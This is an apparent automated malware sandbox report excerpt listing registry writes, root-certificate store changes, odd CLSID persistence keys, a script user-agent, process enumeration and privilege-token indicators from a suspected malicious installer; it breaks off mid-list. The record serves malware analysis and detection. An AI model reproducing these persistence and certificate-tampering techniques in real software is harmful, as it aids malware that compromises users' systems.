Set value (str) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\TreeView = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\PrivacyAdvanced = "0" MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CachePrefix MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\IETld\LowMic MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Extensible Cache MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\DXFeatureLevel = "0" MicrosoftEdge.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\5785CBDF4ABB5AD409841A692AF14EA9 msiexec.exe Set value (int) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History\CacheLimit = "1" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\FirstRecoveryTime = b9d9ec28329fd701 MicrosoftEdge.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{IIRT641V-ST1Y-V6LD-W3TL-UIUSI353MX63} svchost.exe Set value (int) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\ACGPolicyState = "8" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History\CacheLimit = "1" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\LowMic MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VersionHigh = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus\CIPolicyState = "0" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\TypedUrlsComplete = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListDOSTime = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-DXFeatureLevel = "0" MicrosoftEdge.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID svchost.exe Set value (int) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-Revision = "0" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modif = 01000000167c80ba8002dd6558dbbc8a030ded1bbe43ddca943bba3005808a98b32e94809faef766eb8a7ba106e2548def7079efb6af94150a8e5e657f41 MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Explorer\Main\OperationalData = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\ACGStatus\ACGPolicyState = "6" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = d76c43fd8aa6d701 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings MicrosoftEdgeCP.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{THWC794Y-FI2R-S1WY-Z6CW-JHPFT080JY70}\7289246C77593EBF svchost.exe Set value (int) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\ReadingStorePending = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\ACGStatus MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ServiceUI MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListXMLVersionHigh = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\Main\OperationalData = "1" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\TreeView = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-SubSysId = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListXMLVersionHigh = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-SubSysId = "0" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\ACGStatus\DynamicCodePolicy = 00000000 MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\New Windows\AllowInPrivate MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = a219b1fd8aa6d701 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ServiceUI\IsSignedIn = "0" MicrosoftEdge.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\SourceList msiexec.exe Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\EnablementState = "1" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\SignaturePolicy = 06000000 MicrosoftEdgeCP.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance gdgame.exe -
Processes:
installer.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 0f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d432000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa62000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d43190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 5c000000010000000400000000080000190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa604000000010000001000000087ce0b7b2a0e4900e158719b37a893722000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 installer.exe -
Runs ping.exe 1 TTPs 1 IoCs
-
Script User-Agent 9 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 11 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 20 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 23 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 63 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 8 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 9 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 16 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 18 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 21 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 61 IoCs
Processes:
Setup.exe5531728.exe6279164.exeWerFault.exeWerFault.exeSetup.exeServices.exeRegAsm.exewrap 1.exerundll32.exesvchost.exeMsiExec.exeMsiExec.exemsiexec.exeIBInstaller_74449.tmppid process 4244 Setup.exe 4244 Setup.exe 4244 Setup.exe 2356 5531728.exe 4904 6279164.exe 692 WerFault.exe 692 WerFault.exe 692 WerFault.exe 692 WerFault.exe 692 WerFault.exe 692 WerFault.exe 692 WerFault.exe 692 WerFault.exe 692 WerFault.exe 692 WerFault.exe 692 WerFault.exe 692 WerFault.exe 692 WerFault.exe 692 WerFault.exe 692 WerFault.exe 692 WerFault.exe 4144 WerFault.exe 4144 WerFault.exe 4144 WerFault.exe 4144 WerFault.exe 4144 WerFault.exe 4144 WerFault.exe 4144 WerFault.exe 4144 WerFault.exe 4144 WerFault.exe 4144 WerFault.exe 4144 WerFault.exe 4144 WerFault.exe 4144 WerFault.exe 4144 WerFault.exe 4144 WerFault.exe 4144 WerFault.exe 1300 Setup.exe 1300 Setup.exe 1820 Services.exe 1820 Services.exe 4308 RegAsm.exe 4308 RegAsm.exe 1528 wrap 1.exe 1528 wrap 1.exe 3640 rundll32.exe 3640 rundll32.exe 4380 svchost.exe 4380 svchost.exe 1080 MsiExec.exe 1080 MsiExec.exe 3960 MsiExec.exe 3960 MsiExec.exe 3960 MsiExec.exe 3960 MsiExec.exe 4988 msiexec.exe 4988 msiexec.exe 4380 svchost.exe 4380 svchost.exe 4312 IBInstaller_74449.tmp 4312 IBInstaller_74449.tmp -
Suspicious behavior: MapViewOfSection 3 IoCs
Processes:
MicrosoftEdgeCP.exeMicrosoftEdgeCP.exepid process 1588 MicrosoftEdgeCP.exe 3656 MicrosoftEdgeCP.exe 3656 MicrosoftEdgeCP.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
